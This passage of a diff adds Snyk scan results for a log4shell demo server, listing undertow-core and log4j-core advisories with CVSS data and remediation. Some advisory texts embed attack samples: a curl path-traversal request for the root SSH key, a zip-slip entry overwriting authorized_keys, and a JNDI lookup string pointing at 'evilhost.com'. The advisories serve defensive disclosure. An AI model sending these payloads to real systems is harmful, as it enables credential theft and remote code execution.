"io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-7300152", + "title": "Uncontrolled Resource Consumption", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.2.33.Final)", + "[2.3.0.Final,2.3.14.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.33.Final", + "2.3.14.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/90f202ada89b6d9883beed0f1fe10c99d470d9a8", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2293069", + "title": "Red Hat Bugzilla Bug" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.7, + "cvssVersion": "4.0", + "modificationTime": "2024-06-24T09:03:55.525177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-06-24T09:03:55.525177Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption through the handling of URL-encoded request path information on `ajp-listener`. 
An attacker can cause the server to process incorrect paths, leading to a disruption of service by sending specially crafted concurrent requests.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/90f202ada89b6d9883beed0f1fe10c99d470d9a8)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2293069)\n", + "epssDetails": { + "percentile": "0.09306", + "probability": "0.00043", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-6162" + ], + "CWE": [ + "CWE-400" + ], + "GHSA": [ + "GHSA-9442-gm4v-r222" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-06-21T06:28:17.382174Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-06-20T15:31:19Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-06-21T07:17:01.928932Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-24T09:03:55.525177Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.33.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-7300153", + "title": "Uncontrolled Resource Consumption ('Resource Exhaustion')", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Bartek Nowotarski" + ], + "semver": { + "vulnerable": [ + "[,2.2.33.Final)", + "[2.3.0.Final,2.3.14.Final)" + ] + }, + "exploit": "Not 
Defined", + "fixedIn": [ + "2.2.33.Final", + "2.3.14.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://httpd.apache.org/security/vulnerabilities_24.html", + "title": "Apache Advisory" + }, + { + "url": "https://github.com/undertow-io/undertow/commit/c27c1e40c945c11f13b210fd72fadf0ae641f3d0", + "title": "Github Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/commit/296636d341dd8c9ff60dae017500c61f051bc42a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/commit/d798de663e834450acec1041e44bae938a7b45b6", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268277", + "title": "RedHat Bugzilla Bug" + }, + { + "url": "https://www.kb.cert.org/vuls/id/421644", + "title": "Security Notes" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-04-04T13:31:53.396581Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-05-28T11:02:47.420228Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-06-07T01:11:20.186304Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.7, + "cvssVersion": "4.0", + "modificationTime": "2024-06-24T09:04:33.419941Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-06-24T09:04:33.419941Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-04-04T13:31:53.396581Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-05-28T11:02:47.420228Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-06-07T01:11:20.186304Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') due to insufficient limitations on the amount of `CONTINUATION` frames that can be sent within a single stream. An attacker can use up compute or memory resources to cause a disruption in service by sending packets to vulnerable servers.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n## References\n- [Apache Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)\n- [Github Commit](https://github.com/undertow-io/undertow/commit/c27c1e40c945c11f13b210fd72fadf0ae641f3d0)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/296636d341dd8c9ff60dae017500c61f051bc42a)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/d798de663e834450acec1041e44bae938a7b45b6)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2268277)\n- [Security Notes](https://www.kb.cert.org/vuls/id/421644)\n", + "epssDetails": { + "percentile": "0.75602", + "probability": "0.00459", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-27316" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-06-21T06:34:44.643940Z", + "functions_new": [], + 
"alternativeIds": [], + "disclosureTime": "2024-04-03T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-06-21T06:34:44.890198Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-24T09:04:33.419941Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.33.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-7361775", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.2.33.Final)", + "[2.3.0.Final,2.3.12.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.33.Final", + "2.3.12.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/9b7c5037eb3eff021366233a0af6b82ec83c7d94", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259475", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-05-09T13:34:57.715909Z" + }, + { + "assigner": "NVD", + 
"severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:52:49.711513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-06-24T08:51:30.646140Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-05-09T13:34:57.715909Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:49.711513Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Directory Traversal due to improper input validation of the HTTP request. An attacker can access privileged or restricted files and directories by appending a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. 
By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.12.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/9b7c5037eb3eff021366233a0af6b82ec83c7d94)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2259475)\n", + "epssDetails": { + "percentile": "0.20823", + "probability": "0.00052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-1459" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-06-24T08:51:30.470325Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-01-18T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-06-24T08:51:30.645852Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-24T08:51:30.646140Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.33.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-7433720", + "title": "Uncontrolled Recursion", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,2.3.8.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.8.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + 
"severity": "high", + "cvssScore": 8.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292211", + "title": "Red Hat Bugzilla Bug" + }, + { + "url": "https://access.redhat.com/errata/RHSA-2024:4392", + "title": "Red Hat Security Advisory" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.7, + "cvssVersion": "4.0", + "modificationTime": "2024-07-17T10:19:41.285562Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-07-17T10:19:41.285562Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Recursion in chunked response handling. An attacker can cause a client to wait indefinitely by sending excessive data without a `0\\r\\n` termination sequence in chunked responses, thereby disrupting service to the server. 
\r\n\r\n**Note:** This is only exploitable when using `NewSessionTicket` functionality in TLS 1.3 on Java 17.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.3.8.Final or higher.\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2292211)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n", + "epssDetails": { + "percentile": "0.16001", + "probability": "0.00045", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-5971" + ], + "CWE": [ + "CWE-674" + ], + "GHSA": [ + "GHSA-xpp6-8r3j-ww43" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-07-10T07:31:06.494967Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-07-08T21:31:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-07-10T14:09:02.139513Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-17T10:19:41.285562Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.3.8.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-7433721", + "title": "Memory Leak", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", 
+ "severity": "low", + "cvssScore": 2.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437", + "title": "Red Hat Bugzilla Bug" + }, + { + "url": "https://access.redhat.com/errata/RHSA-2024:4392", + "title": "Red Hat Security Advisory" + }, + { + "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562", + "title": "Vulnerable Code" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", + "assigner": "Snyk", + "severity": "low", + "baseScore": 2.3, + "cvssVersion": "4.0", + "modificationTime": "2024-07-10T14:39:24.891744Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-10T14:39:24.891744Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. 
An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n", + "epssDetails": { + "percentile": "0.16001", + "probability": "0.00045", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-3653" + ], + "CWE": [ + "CWE-401" + ], + "GHSA": [ + "GHSA-ch7q-gpff-h9hp" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-07-10T07:43:42.505449Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-07-09T00:31:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-07-10T14:39:24.891304Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-10T14:39:24.891744Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" 
+ ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.16.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.16.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", + "title": "Apache Pony Mail" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://twitter.com/marcioalm/status/1471740771581652995", + "title": "Twitter Post" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", + "title": "Nuclei Templates" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9, + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:32.295395Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "type": 
"secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. 
If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99913", + "probability": "0.97364", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45046" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-7rjr-3q55-vv33" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-14T18:28:31.339218Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-14T18:01:28Z", 
